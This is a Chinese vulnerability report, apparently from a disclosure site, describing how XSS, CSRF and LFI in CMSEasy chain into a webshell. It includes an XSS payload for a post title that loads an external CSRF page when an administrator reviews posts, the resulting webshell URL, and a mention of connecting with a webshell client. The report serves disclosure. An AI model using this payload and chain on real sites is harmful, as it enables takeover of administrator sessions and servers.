### 简要描述:
利用XSS+CSRF+LFI即可从前台直接拿到webshell
### 详细说明:
```
None
```
把此页面放到另外一个站点空间下,如url链接:
http://localhost/cmseasy-csrf.html
第三步,然后在第一步的帖子标题中插入xss,xss code内容如下:
`><iframe src= http://localhost/cmseasy-csrf.html >//src后面的url一定不能加`
写好帖子,保存,发布此帖子即可。
第四步,当管理员进行帖子管理时,就会触发帖子标题处的xss,发送请求,添加表单,得到webshll。如下如管理员进行帖子管理时,成功添加了表单。
[<img src="https://images.seebug.org/upload/201311/26095409c44bcbdedd6f413aee61061c94425a61.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201311/26095409c44bcbdedd6f413aee61061c94425a61.png)
得到的webshell的地址为:
http://localhost/cmseasy/index.php?case=form&act=add&form=my_88888888,form的值就是你csrf请求页面里卖弄的name的值,即表单名。
菜刀成功连接,得到webshell。
[<img src="https://images.seebug.org/upload/201311/26095426d9c5167ce65df25b2d2293e06318907d.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201311/26095426d9c5167ce65df25b2d2293e06318907d.png)
当然利用上面的四种漏洞,还能综合利用,多种方法都能拿到webshell
### 漏洞证明:
见详细说明
暂无评论